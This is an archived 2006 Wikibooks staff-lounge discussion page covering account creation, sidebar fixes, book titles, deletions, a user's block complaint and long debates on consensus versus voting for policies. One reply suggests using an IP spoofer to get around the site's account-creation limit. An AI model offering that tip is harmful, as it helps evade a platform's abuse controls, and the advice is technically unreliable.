Talk:Cookbook is the main cookbook discussion page. From there you can find a link to pages in the cookbook namespace or you could browse to Category:Recipes to see the recipes that have been tagged with {{recipe}} Kellen T 11:49, 30 April 2006 (UTC)
Requesting 'bot status to accounts
This is an FYI to all Wikibooks users, that a recent change in MediaWiki software on the latest round up updates has included a feature for marking accounts with the 'bot (for robot or automated) flag on accounts can now be set locally without having to deal with stewards on meta. This is now an "additional" responsibility that can be performed by bureaucrats.
As usual, you should still use the Wikibooks:Requests for adminship#Requests for bot status to let everybody know that you want to have the bot flag added to an account, but you no longer have to make the request on meta after the decision has been made unless there aren't any active bureaucrats that are paying attention. --Rob Horning 12:43, 26 April 2006 (UTC)
School project
I'm just letting everyone know that some of my pupils will be working on some wikijunior pages with me over the next 5 weeks. You will recognise them because they all have (knott) in brackets after a nickname. If you have any problems with them please let me know. It would be nice if someone welcomed them, and edited some of their pages. Their spelling and grammar is likely to be in need of a little help, and thier formatting will be terrible at first.
Also we only managed to create 3 accounts. We are using a proxy and we got a message saying that there have already been 6 accounts created. Is there a time limit on this? Cdan we create more accounts next week? Theresa knott 15:37, 26 April 2006 (UTC)
- It's possible, and probable, that your connection is going through one of the many proxies used in the UK for educational Internet providers, which might appear to Wikibooks et al. as having the same IP address, depending upon a number of factors. If this is the case, then it's quite plausible that the account creation limit from that apparent IP address has been hit. This should be reset within 24 hours or so. 86.133.210.53 20:09, 26 April 2006 (UTC)
- Normally I wouldn't suggest this, but an IP spoofer might be the way around this. GarrettTalk 20:38, 26 April 2006 (UTC)
Need more books
Excellent wiki you have here. I love the language section. The only thing this wikibook website needs is: books! I anticipated finding lots of public domain literature here. But alas, not a Shakespeare sonnet to be found. Perhaps that's in the works? 129.174.63.163 11:11, 27 April 2006 (UTC) Jess
- Ah, you're looking in the wrong place. Wikibooks is for textbooks. For public domain literature, you'll need to look at our sister site, Jguk 11:51, 27 April 2006 (UTC)
Votes for adoption?
Erik Moeller wrote on textbook-l:
- For projects which are deemed outside the scope, as an alternative to deletion, it might be a good idea to have "Votes for adoption" - books tagged in this form could continue to be developed for the time being, but people would be encouraged to find a different, free content wiki to host them. Once there is consensus about a new home, the Wikibooks version would be redirected there.
I now forward the idea. --Kernigh 05:17, 28 April 2006 (UTC)
- I have no problem for using wikibooks in that way for books which have previously in practice been allowed here, but which are now considered outside our scope, provided (1) there has been no final determination that they are now outside the scope; or (2) if, as with computer and video walkthroughs, there is general acceptance that they are now outside the scope, as long as an alternative location is actively being looked for (which is the case for the walkthroughs). I would not be in favour of Erik's proposal for new books, Jguk 06:18, 28 April 2006 (UTC)
Creating account does not work
When trying to create an account the picture wouldn't show up blocking me from creating the account. In other wikis this is no problem. I use Firefox 1501, several extensions which work perfectly well with other wikis. Java/script are on.
-- Hvezd 09:12, 2006-04-29 (UTC)
- Can you try again at Special:Userlogin? From my copy of (outdated) Firefox 1.0.6, I was able to see image.
- Of course, check that you did not tell Firefox to block images from en.wikibooks.org. (Most of the images on this site are from upload.wikimedia.org, so you would still be able to see them.) Right-click the words-image and make sure "Block images from en.wikibooks.org" is not checked. --Kernigh 08:12, 1 May 2006 (UTC)
Thanks. I never blocked any file of any wiki-site. I created accounts in other wikis before without any problem. I could create an account in wikibooks via IE. Firefox showed the missing picture file in other wikis, just not in wikibooks. Now, 3 days later, it works again. No idea why. -- Hvezd 12:45, 2006-05-02 (UTC)
Sidebar
I've been bold and tried to improve the sidebar. Unfortunately, for some reason I can't fathom, the two items under "search" appear out of kilter. The page that feeds into the sidebar is MediaWiki:Sidebar. If anyone can see what's wrong please let me know (the page is protected so only admins can edit it). Of course, if you have ideas for improvements yourself, let us know too:) Jguk 07:12, 1 May 2006 (UTC)
- This shows that m:Be bold should apply to "MediaWiki:" pages even though only administrators can edit those.
- The problem with "search" was that the text was centered. This is because both the "search" (By subject, Alphabetically) and "search" (text field, Go button, Search button) sections are
<div class="portlet" id="p-search">in the HTML. The stylesheet centers the second "search" section, and thus also the first. I believe that I fixed the problem by changing "search" to "books". --Kernigh 08:02, 1 May 2006 (UTC)
- ... maybe I should have set it to "textbooks" instead of "books" ... --Kernigh 02:49, 3 May 2006 (UTC)
BDSM on Wikibooks:Votes for undeletion
Since the Wikibooks:Votes for undeletion page is rarely used, this is to notify everyone that I have listed a module there. --Kernigh 06:30, 3 May 2006 (UTC)
Preparing for an Employment Interview
I would like to rename this book to something that is more concise, and would be easier to find. I'm looking for suggestions now, because I would like to start doing some major work on this book, such as breaking it down into sub pages, and working on the formatting etc. I don't want to make a bunch of subpages now, and then have to go back and rename all of them when we think of a better name. I would certainly appreciate any suggestions that anybody has on this matter. --Whiteknight (talk) (current) 19:10, 4 May 2006 (UTC)
- I agree that it's a bit of an awkward title, but I couldn't think of something nicer unless you want to roll it into a general-purpose "Interviewing" book. Kellen T 20:44, 4 May 2006 (UTC)
- True, but even then, it covers resume building and cover-letter writing. I was thinking something like "Get a Job", but i feel like that's too base. --Whiteknight (talk) (current) 21:23, 4 May 2006 (UTC)
Preparing for a job interview? Jguk 06:40, 5 May 2006 (UTC)
- That still seems too long a title. Maybe i'm just being unnecessarily picky, however. I just want something that will be easy to find in the "search box" by newcomers, although maybe this subject doesn't lend itself easily to that. Since this is on the "How-to bookshelf", I'm thinking we can go with the general scheme of things over there and imply the title with How-To: "Get a Job". --Whiteknight(talk)(projects) 16:05, 5 May 2006 (UTC)
- Most titles on Wikibooks are actually short. We have many one-word titles like Calculus? Feminism? I suggest longer titles. With very long titles, one can attempt shorthand, as in Guide to Unix for "Wikibooks Guide to Unix Computing". --Kernigh 00:31, 6 May 2006 (UTC)
- I generally prefer shorter titles, just because it is easier to do an effective search for a short title then for a long one. For instance, it would be much quicker to search for Unix then for Guide to Unix. That's just me though. I'm leaning towards (how to)Find a Job. because it's on the how-to bookshelf, and many of the titles there imply the "how to". --Whiteknight(talk)(projects) 13:27, 8 May 2006 (UTC)
I think i'm going to just name this one "Find Employment" for now, because I would like to start working on this project more, and i'm impatient. If anybody has a better title for it, feel free to move it. --Whiteknight(talk)(projects) 21:14, 8 May 2006 (UTC)
what do i need to do to be able to hear the sound files here at wikibook?
im havin troubles, since its in .ogg format :(
Jane kiedis 21:09, 6 May 2006 (UTC) Jane kiedis
- Winamp can play .ogg quite well. Grue 21:34, 6 May 2006 (UTC)
- --Kernigh 03:06, 8 May 2006 (UTC)
Why Talk:Ada Programming/Contributing was deleted?
As you can see, this page was deleted [3] with the unique comment of "There is no module". I think this page does not qualify as a speedy deletion. This one was a page with metainformation about the Ada Programming book targeted to the contributors. I guess it was deleted because there was not a corresponding module page, but a deletion of useful content without warning is a bit aggressive behaivour. Please, could some administrator undelete it? On the other hand, is there an appropiate space for metainformation about a book? We discussed that topic in Talk:Ada_Programming/Contributors_lounge and then we moved the page, that previously was in the main namespace Ada Programming/Contributing, to the talk namespace. I didn't feel totally satisfied, but never thought a useful talk page would be deleted only because there was not a correspondent content page. ManuelGR 12:12, 7 May 2006 (UTC)
- The book contributors should be able to choose whatever forum they like to discuss the project as a whole. The cookbook uses Talk:Cookbook as a sort of staff lounge, but we also have Cookbook:Policy for defining contributing guidelines. An admin should undelete the page. Kellen T 13:45, 7 May 2006 (UTC)
RFC Jimbo
I have requested Jimbo explain wikimedia's policy with respect to howtos on his WP talk page. Kellen T 23:50, 8 May 2006 (UTC)
- Jimbo has responded. His position is that most of the howtos should go. Kellen T 18:39, 12 May 2006 (UTC)
Recruiting Contributors
I have been working on a very ambitious Wikibook project since October, and have so far attracted two contributors. One of them has disappeared, and I expect the second one to disappear soon because the module for which he has expertise is nearly complete.
I have been trying to attract more contributors from the community at which this work is directed, but so far, I have had little success. So now I have an idea that I'd like to get some feedback on.
I would like to have custom lapel pins made for Wikibook contributors. Contribute to "my" book, and I'll send a free pin. Unfortunately, it looks like the minimum order is 50 or 100, depending on who you go to, and then the price for the whole lot runs from between $170 to $250 (US). First, I surely am not going to need anywhere near 50 pins - 5 or 10 is probably more like it. Also, I am unwilling to devote my financial resources to something that has a risky return (pins might not attract contributors).
However, if the pin design were a generic Wikibooks design, then I can imagine that the risk (and cost) could be shared by many Wikibookians. The most promising supplier looks to me like it might be these guys (no minimum order, but the difference between 20 pins and 50 pins is very small). I have no affiliation with them, and found them via Google.
Is anyone interested in something like that? Maybe the Foundation could have a couple hundred of them made and sell them in onesies and twosies for a small profit. Thoughts?
Jim Thomas 00:27, 10 May 2006 (UTC)
- I doubt wikimedia would be up for this, and I don't know that it'd actually encourage people to stick around or even to contribute in the first place, but it might be fun. You're looking at lapel pins, which are quite expensive as they are produced from custom-made diess. If you looked instead at 1-inch buttons (think punk kids), you would find the price to be way more reasonable and maybe even something you might feel comfortable bankrolling for your book in particular. Kellen T 00:32, 10 May 2006 (UTC)
- My target audience is into pin trading, which is why I suggested that. Since we're a scouting-type of an organization, we have uniforms, and the pins go nicely there.
- Wikimedia already has a CafePress store. There's a general Wikimedia button pack, but no Wikibooks one. It wouldn't be particularly difficult to sell a Wikibooks logo-stamped button through CafePress, so I suggest you e-mail wikipedia@cafepress.com if that's what you would like. Don't count on selling quality pins through the foundation however. Hope you find something, ✉haginძazt\c 01:45, 10 May 2006 (UTC)
- Thanks Hagindaz. I sent cafepress an email asking if they'd consider offering lapel pins. We'll see what happens. Jim Thomas 02:08, 10 May 2006 (UTC)
please help
I have been blocked by inshanee on charges that are wholly trumped up and false.
in fact, i am working on the very issue myself; i was blocked for alleged "attacks".
Everything i have said is cogently factual, and thus, not an attack, with a single possible exception being a vote i made.
Even there, i could provide logic to show that in fact, i am just making a cogent observation.
The truth is that this is a pov warrior event and inshanee is abusing his admin priveledge.
I am working on the problem of personal attacks, in fact, and this is one reason why i am being targeted. Inshanee and strotha both like to use sly attacks, and then pounce on you when you defend yourself. My version of reality being the cogent analysis and recognition of this tactic puts them in a hard spot where they would not be able to use the method if i can get the problem resolved.
what follows is what blocking me kept me from posting in response to the "personal attacks" topic posted on Jimbos talk page.
Prometheuspan 19:37, 10 May 2006 (UTC) Actually, thats a slippery slope, a hyperbole, and, its untrue. Using logic, we can discern between attacks and useful conversation about people. More importantly, right now Wikipedia has become an ad hominem fest. In fact, wikipedia has become extremely abusive, thanks to no clear means to deal with the abusiveness. This is a circular problem in that people with expertise won't participate if they can tell just by browsing the talk pages that its psychological mob warfare defending VS the ignorant to bother to try. For example; I'm not adding any material regarding Psychonautics. I might just be one of the worlds foremost experts on the topic, having managed to obtain waking Theta states in both myself and others. The topic is allready controversial amongst the well educated. Add to this the inevitable problem of facing down an ignorant mob as soon as you say something the thought police finds dangerous to maintaining ignorance, and you have a formulae for abuse. IF logic and cogency were the dominant paradigm on Wikipedia, then experts might feel safe to come here and contribute. All of the sciences at advanced levels become politically inconvenient for the dominant religious and political paradigms. Those paradigms can only continue to exist via the vaccum created by intentional ignorance. Ignorance is maintained via anti intellectual pack psychology. And right now, Wikipedia as a form of government falls easilly into the category "pack psychology driven MOB".
THE ONLY way to fix this is to make real changes in policy and methods of enforcement regarding personal attacks. (And other considerations of logic, including straw man arguments and false dillemmas.) Prometheuspan 19:37, 10 May 2006 (UTC)
Now, I am getting really sick of being gamed and played by abusive people here, and my next step is to start taking my complaints to people who will listen. Wikiwatch has allready featured me. For instance.
I am trying to resolve these problems, and these people are being patently abusive.
If these problems can't be resolved, then it seems that i will be forced to leave wikibooks and wikipedia, and to make certain that the world knows that wikipedia is an extremely abusive place.
Prometheuspan 19:37, 10 May 2006 (UTC)
- (Trying to be helpful) I have no idea what you're talking about here. You have given insufficient context. Your formatting is also a serious problem that is inhibiting communication; try to write in paragraphs containing one or more sentences, try not using breaks (instead, use indentation or quoting). Finally, write focused sentences that state the facts, with appropriate references (links) to where these things occured; leave your emotional appeals out of it since they only distract from your point. Kellen T 19:45, 10 May 2006 (UTC)
- I'm trying to figure out exactly what the problem is. you are clearly able to leave a message here, which indicates to me that you are probably not blocked from wikibooks. maybe you should be more specific as to how you are blocked, and how we can help. --Whiteknight(talk) (projects) 19:47, 10 May 2006 (UTC)
- He is apparently talking about being blocked at WP: w:User_talk:Prometheuspan, where he has made a bunch of disruptive edits, especially in AFD. Kellen T 20:02, 10 May 2006 (UTC)
Disruptive edits. the characterization begins. sorry if i am badly formatted, i loose some amount of my dyslexia compensation when i am po'ed. Those VFDs were mockeries of consensus process. What good is WP:No attacks when the rule is only selectively applied to people rogue admins want to fast track or intimidate into silence? I made cogent and rational additions to 3 vfds which were all of them started by an ad hominem. And all of which were patently pov warrior gaming of the system. In most cases, i just pointed out factual ad hominems. As votes. Maybe i should have invoked WP: remove attacks, and deleted said votes. Hard to tell what the right move is in such a corrupted double standard system.
In any case, thats not why i am being blocked. I am being blocked for defending myself against attacks, using cogent and factual logic. The double standard here is apalling. Nevermind in any case, apparently the only way to deal with the abusiveness of this system is to go outside of the system and unleash the fury of a Sociologist with depth knowledge of Logic.
obviously, if after a week and a half of abuse has gone unpunished, and nobody cares about it on admin noticeboards, and theres no method to get abuse dealt with, esp by abusive admins, this is a futile effort also. By all means, just ignore me and dismiss me, its all anybodies done so far, i have come to expect it. Prometheuspan 21:39, 10 May 2006 (UTC)
Prometheuspan 21:39, 10 May 2006 (UTC)
- Hey man, listen up, your ego is astounding. First off, your not going to get anywhere in this place by getting angry, thats not how wiki works. Secondly, its not a great idea to threaten to leave because nobody cares, there are a thousand people here any of which could take your place. Thirdly, stop ranting about the abusive system because the system owns you, your account, everything you have written here, and they know your IP address. Fourthly i think you just threatened all of us with, and I quote: "Nevermind in any case, apparently the only way to deal with the abusiveness of this system is to go outside of the system and unleash the fury of a Sociologist with depth knowledge of Logic."That is highly abusive of your privilige to write here, so in future please save a couple bytes of hard disk space and submit any complaints like a good wikibookian. Hope you haven't already vandalized the system and your wikibookian soul can still be salvaged! Basejumper123 23:59, 10 May 2006 (UTC)
- Wikibooks is not Wikipedia. Whatever it is you have or haven't done over there it doesn't involve Wikibooks. Please feel free to take your case to Wikipedia:Administrators' noticeboard/Incidents if you haven't already. Thank you. GarrettTalk 04:44, 11 May 2006 (UTC)
Text Wrap
In Wikijunior: Solar System, we're having some trouble with pictures moving text too much, what is the wiki-code for text-wrap? Basejumper123 23:49, 10 May 2006 (UTC)
- Not quite sure what you mean; if you use the right/left/center modifiers on Image, you get text wrap automagically. See w:Wikipedia:Extended_image_syntax. If you're trying to prevent images from descending into other sections you can use <br style="clear:both"/> Kellen T 03:08, 11 May 2006 (UTC)
MSRI video lectures
This might be of interest to people who maintain the mathematics section of wikiversity.
MSRI has a large collection of videolectures here. Download is free, and although I am not sure that they have the right license, the fact that they keep most of their videos on archive.org indicates that the license is free enough.
Please, answer me on my talk page.
Using Wikibooks logo in a link?
I'm trying to set up a link from my website to a wikibook (Stuttering) that doesn't have its own graphic or image. Can I use the Wikibooks logo that appears in the upper left corner of the Main Page? Where can I get this image (or a link to it)? This is for a list of recommended books, and the other books have the cover on the left, and my recommendation on the right. It looks bad to not have some image for the wikibook.--Thomas David Kehoe 17:17, 11 May 2006 (UTC)
- The Wikimedia Foundation has established guidelines for use of their logos. They can be found at foundation:Wikimedia visual identity guidelines. Hope this helps. Gentgeen 19:02, 11 May 2006 (UTC)
- I noticed I didn't answer your question about where the file can be found. It is located on the Wikimedia Commons at Commons:Wikimedia. Gentgeen
How To Build A Pykrete Bong
I would like to suggest that How To Build A Pykrete Bong be deleted as it is innapropriate material for wikibooks —the preceding unsigned comment is by Basejumper123 (talk • contribs)
- no, it was still on the bookshelf —the preceding unsigned comment is by Basejumper123 (talk • contribs)
- The page was already deleted. This was evidenced by the fact that you were the only contributor to the book when you posted the above comment. If it was still on the bookshelf, you could have removed it and that would have been end of story. Also, please sign your comments using four tildes, like so: ~~~~ Kellen T 20:58, 12 May 2006 (UTC)
Introduction to Physical Science
Hi everyone, Im trying to write a simple, 8th grade science text that is an "introduction to physical science". It will try to stick to the following syllabus
- laboratory procedure
- measurement
- calculation
- properties
- basic experimentation
I have already written the first chapter, please help out if you have time, the link is here Introduction_to_Physical_Science thanks,
Basejumper123 00:50, 12 May 2006 (UTC)
Policy review - vote now!
There are a lot of policies that have not been resolved. How about focussing on Wikibooks:No personal attacks this month? Can we wrap-up the vote on this? I would also move for Wikibooks:Ad hoc administration committee to be deleted because it looks like it will never go to a clear majority vote. RobinH 16:05, 12 May 2006 (UTC)
There is no policy governing voting
Perhaps before reviewing any other policies the following proposed policy might be reviewed(!): Wikibooks:General voting rules RobinH 10:18, 13 May 2006 (UTC)
Positive language policies
I've just read a bunch of the policy pages and I find myself agreeing with User:Jguk and User:Zephram Stark that we should be attempting to form policies that are in positive terms and not so legalistic and punitive in nature. Jguk proposed something along the lines of Wikibooks:Always act civilly. Zephram has also pointed to this posting by Jimbo for some other context. Kellen T 17:30, 12 May 2006 (UTC)
- Well, Zephram is an odd case since he was banned multiple times from Wikipedia for disruption, etc. You may want to take this into account as you deal with him in the future. --LV (Dark Mark) 21:25, 12 May 2006 (UTC)
- Point taken, but I still agree with his position. Kellen T 21:29, 12 May 2006 (UTC)
- That's fine. Just letting you know where he's coming from. --LV (Dark Mark) 23:30, 12 May 2006 (UTC)
I support Jguk's intention but am doubtful about his means of achieving it. For instance, suppose a user reverted a policy page that had been moved, after a vote, from "proposed" to "enforced" back to "proposed" without any warning at the staff lounge or elsewhere. Suppose I reverted this reversion of the "Enforced" status to "Proposed". Suppose the user reverted that reversion and I reverted that... How would "be nice" solve the resulting fracas?
I support a minimum of rules, perhaps 3 major rules such as:
These would contain most problems that could arise here when "being nice" has broken down. For instance the reversion problem above would be forestalled by Wikibooks:General voting rules and would fall under Wikibooks:Editing disputes policy if a vote had not been taken. RobinH 10:43, 13 May 2006 (UTC)
- For your revert scenario, common sense prevails, an admin temporarily blocks the provoking user and instructs them to act civily or leave. The net effect is the same, I think. Having a policy doesn't really make people act more or less sensibly. Kellen T 15:21, 13 May 2006 (UTC)
- Firstly, what basis would you use to determine if a "revert war" was indeed taking place? One mans's revert war is another man's innocent correction.
- Secondly your suggestion that they be "blocked from editing the page and forced to discuss the matter" is none other than the Wikibooks:Editing disputes policy.
- Your point also places admins at the top of the control hierarchy, like tribal leaders. But suppose an admin reverted the policy page without any warning and another admin reverted the text to its original form. Who should block the admins when there is no policy? If we go for 100% consensus one or other of the admins can just refuse to agree. At the minimum we would need Wikibooks:General voting rules to resolve the situation. RobinH 09:27, 14 May 2006 (UTC)
- It becomes a revert war when the two people who are reverting do it to the same page multiple times. At that point they can't claim that it's just an "innocent correction" because they're actively engaging each other.
- I think Wikibooks:Editing disputes policy is common sense and if not then it's dictated by the idea of "acting civily"
- Admins are at the top of the control hierarchy. It's a fact of life. If they step out of line, though, then they're stripped of their powers. Admins can block other admins as they see fit.
- You're misunderstanding what consensus means. Consensus decision making is predicated upon several things; that all users are working towards the same mission (to build textbook-ish instructional materials), that all users are acting in good faith, and that all users will work towards compromises when disputes arise. If a user is not working towards our goal, not acting in good faith, or not attempting to find compromises, the community can and should ignore or ban them depending upon the severity. Consensus is about evaluating the positions of users on issues, not counting their votes. If only 1 person in a straw poll is saying no, but they provide no acceptable reason, they get ignored. If they are disruptive, engage in revert wars, employ sockpuppets, etc they get banned. If after all of this, you still have reasonable people acting in good faith who can't agree, then either (a) the issue is dropped since it doesn't have sufficient support (b) (if one group is very large) the motion is passed despite the complaints. In the case of (b) the opposition can learn to live with the decision or decide that due to the decision, WB is not the place for them, or a particular book/article isn't worth the effort for them; that's their decision, and that's okay. This isn't as "easy" as just strict voting, but you end up with more broadly acceptable policies. Kellen T 10:07, 14 May 2006 (UTC)
(Reset indent) Kellen, there are some good points here. Perhaps I should let someone else contribute on the side of voting - is there anyone else out there interested in how Wikibooks operates ???!! I'll come back to this in a week or so - even though this is fascinating and very important I should also be adding to some books! RobinH 10:34, 14 May 2006 (UTC)
I couldn't keep away. Kellen, is your point 4b basically a statement that you agree with some kind of vote? In the example above, suppose a vote had demonstrated consensus according to 4b, would you ban the dissenting user if they reverted the change from "enforced" back to "proposed"? RobinH 12:07, 17 May 2006 (UTC)
- Much of collaborative work is not so much about the changes as the context and social interactions. If the user appears to be acting in good faith in reverting the policy (say, maybe, if there is some serious harm that they claim will come from it) then no, it probably doesn't warrant a ban. If they are just being stubborn and refusing to accept the community's decision, and then they engage in a revert war, they are acting in bad faith and could be banned for being disruptive and not acting civily. Kellen T 14:27, 17 May 2006 (UTC)
- And no, 4b does not mean I agree with some kind of vote. Here is an flowchart I made for consensus decision making. The reality on WB is a bit different (and a bit muddled) due to asynchronous communication.
- People who vote no on something on wikibooks are of two types; stand-asides and blocks. Those who learn to live with the decision, despite the fact that they don't totally agree are implict 'stand asides' in the consensus process. The decision hasn't made them question their fundamental commitment to working on the goal of WB. (Other types of stand asides would be people who abstain or people who just leave a comment) The people who block are those for whom the decision on the proposal is make-or-break. If the community decides to pass the proposal over their objections, they leave. We see this in contributors who just disappear and in contributors who flame out.
- A block in a "real life" organization means you're much more serious about your objection to the point where you are willing to leave the organization if the proposal is passed. Since in these organizations you also have a much more highly developed social environment, this is quite extreme. It obviously doesn't work as well on WB/WP since we have a large and anonymous community with a very low barrier to entry. Kellen T 14:45, 17 May 2006 (UTC)
- Nice flowchart. Voting is introduced in organisations because it is realised that your flowchart is iterative. For example, if a blocker fails to stand aside the decision "shall we override the blocker?" becomes a new proposal, then the decision "shall we override the blocker of the decision to override the blocker" becomes a new proposal. This continues until there are no blockers. However, if blockers at the top level block every other level of the iteration then the only solution is for a gang to form that secretly mounts an attack on the blocker.
- The iterative process is probably a natural way of handling events in an organisation that has no constitution. It is the method used in tribes and gangs. The down-side is that each iteration takes months or years on Wikibooks and this places immense blocking power in the hands of individuals. This blocking may have nothing to do with the decision under consideration - for instance Zephram has voted "no" to several policy proposals in Wikibooks using the same text.
- It is a good flowchart. I disagree with what happens where a member still blocks after his concerns have all been addressed (albeit not to his satisfaction). At that time, we need to decide whether to override the blocker, and it is here that voting becomes useful. Informal voting can be useful to gauge feelings before this time, but the emphasis should be on looking to avoid a formal vote to override a blocker if at all possible, Jguk 17:29, 18 May 2006 (UTC)
- Uh, that's not what it implies at all. Yes, there is a feedback loop, but it's not mechanical. If the person blocks, and the community decides to override their block, the community tries to come to consensus then and there. The blocker isn't able to affect that decision making process by blocking again.
- I agree with you that voting is easier in general and makes it easier to essentially shout down people who disagree with the majority, but I don't think it's the best way to come up with broadly accepted and useful policies. Keep in mind that wikibooks is not a business and time is not of the essence. We don't have to meet quarterly deadlines or make profit margins, and we can take the time to discuss issues rather than counting votes out of convenience. Kellen T 20:35, 18 May 2006 (UTC)
Page Hits
Hey, is there anyway to find out how much traffic a certain wikipage is getting? Thanks in advance. Daniel.Stevens 07:17, 13 May 2006 (UTC)
- You might be interested in the discussion at [Hit counting]. Apparently the Wiki hit counters cannot be used either in Wikimedia projects because the "Squibs" serve most pages. RobinH 15:55, 13 May 2006 (UTC)
- Well here's why it's called that. Kellen T 10:48, 14 May 2006 (UTC)
Rip a karaoke cd on Wikibooks:Votes for undeletion
Please comment there, and not here. --Kernigh 01:43, 15 May 2006 (UTC)
Bookshelf reorganization
Please see Wikibooks_talk:All_bookshelves#Reorganization. This is as important as deciding policies and is key to the future growth of Wikibooks. --haginძaz 00:04, 16 May 2006 (UTC)
Academics, Wikibooks, and Authorship
I am new to Wikibooks but one thing I am curious about: is there a strong incentive besides altruism to submit material? Since advanced textbooks are written almost exclusively by academics it seems like the open model for textbooks could be hampered by the incentive that drives academia: authorship. Most professors write books based on classes that they teach but even if your book gets wide distribution the publisher takes basically all of the profit. Academics are paid in recognition which does not seem to be exceptionally prevelant on wikibooks and probably limits the ultimate usefulness of the site. What are the general thoughts that people have here on incentive for academic submissions? It seems to me that altruism can only go so far but "primary authorship" or "textbook coordinator" status or something like it could significantly boost incentive to turn a lot of these stubs into high quality books.Mpickett 02:39, 17 May 2006 (UTC)
- Besides altruism and it being fun, I don't think there is much of a strong incentive to submit material. That hasn't hampered WP from gaining submissions from highly educated people, though. Kellen T 09:05, 17 May 2006 (UTC)
- Many of the books here have a list of principal contributors on the front page. For instance: Ada Programming#Authors and contributors, Programming:Visual Basic Classic#Authors and Contributors. As long as it doesn't turn into blatant self promotion I don't think anyone here has a problem with works and authors being associated. In fact I think it is quite the opposite, reputation counts here, I want to know who the principal authors and maintainers of a book are. Does anyone have a friend or relative who has a real reputation in the real world who could be persuaded to donate some words? Could someone persuade Richard Dawkins or Donald Knuth to contribute? On second thoughts we'd better leave Knuth alone or he'll never get The Art of Computer Programming finished and that would be a much greater loss. --kwhitefoot 09:22, 18 May 2006 (UTC)
Implementing consensus on Wikibooks:No personal attacks
I have just re-read the Talk page on Wikibooks:No personal attacks. There really is a consensus on this policy. Those who have voted "No" (two qualifying users) have voted "No" because they disagree with the idea of a vote, or of policies in general, not because they oppose Wikibooks:No personal attacks so there is indeed consensus. I propose that Wikibooks:No personal attacks should be moved to enforced status. RobinH 09:29, 17 May 2006 (UTC)
- I think we're still at the stage of "synthesise concerns" per the above flowchart (which looks good to me). The discussion on my concerns has not really moved forward since 27 April. If you'd like to respond to them, then I would be happy to re-engage in the debate. In this regard, I note that others have said that they would only like one behaviour policy, a sentiment that I would agree with. The question then comes down to whether this is it - whether this one needs to be amended before it becomes policy - or whether a different approach entirely is sensible. I have drafted my own discussion draft of what I believe a good approach for a single behaviour policy would look like on Wikibooks:Be nice. Hopefully that can help us (directly or indirectly) proceed towards getting us a single final behaviour policy that we are all happy with, Jguk 17:08, 18 May 2006 (UTC)
- As I pointed out above, the flow chart above would lead to iterations and the possibility of endless blockings by one user. According to the flowchart and discussion, a user who was dedicated to the well-being of the project would stand aside.
- The "No personal attacks" policy has only one real dissenter, yourself, and you are dissenting on grounds other than opposition to the specific policy. "Be nice" seems to be a carte-blanche for administrators to do as they wish. It does not define "nice". For instance, would it be "nice" for an administrator to archive a warning that a policy was about to be made enforced, then changing it unilaterally from enforced to proposed despite a large majority in favour of enforcement and then blocking it endlessly? Is that "nice"? RobinH 17:57, 18 May 2006 (UTC)
- I have no objection to your production of a meta-policy that includes the other policies but until then we should have something in place. You and Zephram are blocking specific policies on the basis of objections either to multiple policies or any policies. These issues should be discussed separately from whether a specific policy should be adopted. The problem with the model of primitive consensus building in the flow chart is that it does not allow timely decision making, one user can derail all decisions endlessly unless the others gang up on them and override them. I hate gangs. RobinH 18:10, 18 May 2006 (UTC)
With respect, I disagree with you here. First, the flowchart suggests all concerns are discussed. It is only once all concerns have been discussed and there remains a blocking member that we need to decide whether to override that block or not. I note above that here, and only here, do I believe that a binding vote is necessary. At present, none of my concerns have been addressed at all. Maybe they can be, perhaps by improving the language of the proposed policy so that we are all happy with it. If that is not possible, then and only then do you need to decide to override me. Since none of us are arguing that personal attacks are acceptable, there is no reason to believe that it should come to this. This is not my view alone, another user has specifically requested that you address my concerns first before trying again to make this policy.
I would also note that other users have expressed support only on the grounds that they would like a behaviour policy set out, and that the wording can be improved later. In terms of whether this is the right behaviour policy for us to have, it is not too different from my view that the current proposal has some flaws, and these should be ironed out before the policy goes live.
Stepping back further, my Wikibooks:Be nice proposal is meant to be a principle-based policy. That is, it sets out the general principle to be applied. This may be where we differ as you seem to prefer a rules-based policy. That is, a policy that sets out precise rules that you either comply with or you don't. Full stop. Black and white. Personally I believe principle-based policies are more flexible and deal with controversial situations better. Plus they are less susceptible to wikilawyering (for instance, in a rules-based policy either you have followed the letter of the law or you haven't, and if you haven't the wikilawyer claims whatever you now do is unreasonable, even though you followed the spirit of the law). The rules-based policy allows for technical offences, and may create loopholes for the abusive editor to exploit. A principle-based policy is not so precise, but generally allows for greater flexibility and for shorter policy (you do not have to list everything that is to be banned). It also can be as strong as a rules-based policy. For example, would you not agree that swearing, excessive and persistent reverting and making legal threats would unambiguously be considered contrary to a general "be nice" principle-based policy, even when "nice" is not defined? Jguk 18:18, 18 May 2006 (UTC)
- You say that "all concerns" should be discussed but the concern you are raising is the general issue of whether or not policies of the current type should be enforced. Your concern is not directed at the specific policy.
- Your "be nice" proposal needs renaming because it sounds sickly. Apart from that it is an approach that will need a lot of discussion and has little chance of being adopted for months or even years. Please allow specific policies to be adopted and then start a debate about "be nice" - or "Wikibooks standards of behaviour" or whatever it becomes called. RobinH 12:18, 19 May 2006 (UTC)
Implementing consensus on Wikibooks:Deletion policy
Wikibooks:Deletion policy has had a Vote that shows complete consensus. I propose that this is moved to an enforced policy. RobinH 09:38, 17 May 2006 (UTC)
- This is merely one of the ways that you need to be bold and simply do it. Mark it as enforced, and if it is questioned, you can point to the vote for confirmation that some significant concensus has gone into the proposed policy. If half this effort went into the policies on gaming guide removal or the "textbook" definition that seems to taken hold by the deletionists here on Wikibooks, I would have been considerably more supportive of their actions. --Rob Horning 11:45, 19 May 2006 (UTC)
Rejection of Wikibooks:Ad hoc administration committee
The number of votes against Wikibooks:Ad hoc administration committee is such that it will never become an enforced policy. I am demoting it to "rejected" (even though I proposed it). RobinH 09:29, 17 May 2006 (UTC)
Rejection of Wikibooks:No legal threats
Again, too many votes against for a consensus to ever be achieved for Wikibooks:No legal threats.
This will reduce the number of proposed policies to 5 if the status of the policies mentioned is changed. RobinH 10:17, 17 May 2006 (UTC)
- Fair enough - but anyone reading this comment without looking at the background to this rejection should bear in mind that none of the objections was saying that we in any way condone the making of legal threats. We don't, and it won't be long before a user is blocked if that user persists in making such threats, Jguk 17:10, 18 May 2006 (UTC) | http://en.wikibooks.org/wiki/Wikibooks:Staff_lounge/Archive_18 | crawl-002 | refinedweb | 15,388 | 68.1 |
grep through code history with Git, Mercurial or SVNMay 22nd, 2012 at 3:51 am
